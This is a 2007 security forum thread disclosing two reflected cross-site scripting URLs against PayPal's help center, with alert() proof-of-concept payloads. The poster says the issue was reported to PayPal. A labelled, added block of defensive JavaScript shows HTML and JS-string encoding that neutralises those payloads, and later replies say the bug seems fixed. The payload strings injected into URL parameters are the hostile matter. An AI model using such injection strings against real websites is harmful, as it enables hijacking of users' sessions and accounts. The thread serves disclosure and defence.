sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
PayPal [XSS]
Posted by: Anonymous User
Date: June 22, 2007 04:19PM

Before anything is said, I have reported this to PayPal and XSSed.com, and seeing how such sites as Wachovia and Bank of America are in here, and it is probably going to be patched soon, I thought it proper to disclose here.

Type: Cross-Site-Scripting
Vuln: http://www.paypal.com/helpcenter/main.jsp

TAG 1:
http://www.paypal.com/helpcenter/main.jsp
?t=browseTab
&ft=browseTab
&opentopic=<img src="" onerror="javascript:alert('i pwn you!!1');">
&topicTreeId=null
&showcontent=true
&lstLanguageResults=en_US
&locale=en_US
&_dyncharset=UTF-8
&cmd=_help-ext

TAG 2:
http://www.paypal.com/helpcenter/main.jsp
?t=browseTab
&ft=browseTab
&opentopic=20009
&topicName=xss");alert('i pwn you!!2');a("
&topicTreeId=null
&showcontent=true
&lstLanguageResults=en_US
&locale=en_US
&_dyncharset=UTF-8
&cmd=_help-ext



Edited 1 time(s). Last edit at 06/22/2007 05:59PM by 142TeeTH.
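
The two payloads in the post above target different output contexts (HTML markup for `opentopic`, a quoted script string for `topicName`), so each needs its own encoder. The following is an added example, not code from the original post or from PayPal; where each parameter is reflected is an assumption, and `renderHelpPage`, `validTopicId` and `showTopic` are hypothetical names.

```javascript
// Added example: context-aware output encoding for the two reflection points.
// Assumptions (the server-side template is not shown on the page): `opentopic`
// lands in HTML markup, `topicName` in a double-quoted JS string literal.
// renderHelpPage(), validTopicId() and showTopic() are hypothetical names.

// HTML text/attribute context: turn markup metacharacters into entities.
function encodeHtml(value) {
  return String(value).replace(/[&<>"'\/]/g, function (c) {
    return '&#x' + c.charCodeAt(0).toString(16).toUpperCase() + ';';
  });
}

// JS string context: \uXXXX-escape everything except ASCII alphanumerics and
// space, so quotes, parentheses and "</script>" cannot end the literal.
function encodeJsString(value) {
  return String(value).replace(/[^A-Za-z0-9 ]/g, function (c) {
    return '\\u' + ('0000' + c.charCodeAt(0).toString(16)).slice(-4);
  });
}

// Topic ids in the post are numeric (opentopic=20009); reject anything else.
function validTopicId(value) {
  return /^[0-9]{1,10}$/.test(String(value)) ? String(value) : '';
}

function renderHelpPage(params) {
  var topicId = validTopicId(params.opentopic);
  return '<div id="topic" data-topic="' + encodeHtml(topicId) + '"></div>\n' +
    '<script>showTopic("' + encodeJsString(params.topicName || '') +
    '");</script>';
}

// Constructed inputs: the parameter values from TAG 1 and TAG 2 of the post.
var tag1 = { opentopic: '<img src="" onerror="javascript:alert(\'i pwn you!!1\');">' };
var tag2 = { opentopic: '20009', topicName: 'xss");alert(\'i pwn you!!2\');a("' };

console.log(renderHelpPage(tag1));
console.log(renderHelpPage(tag2));
```

Decoding the emitted string literal returns the original `topicName` byte for byte, so the value is preserved as data while it can no longer close the string or the script element.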

Re: PayPal [XSS]
Posted by: ma1
Date: June 22, 2007 06:13PM

Holy Cow, I'm speechless 8|

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: PayPal [XSS]
Posted by: Anonymous User
Date: June 22, 2007 06:51PM

n1!

Re: PayPal [XSS]
Posted by: Anonymous User
Date: June 22, 2007 07:06PM

n1! ?... 1337s3x?

Re: PayPal [XSS]
Posted by: Anonymous User
Date: June 22, 2007 07:38PM

unpack(nice(o.n.e));

Re: PayPal [XSS]
Posted by: hackathology
Date: July 22, 2007 01:04AM

Seems like fixed

http://hackathology.blogspot.com
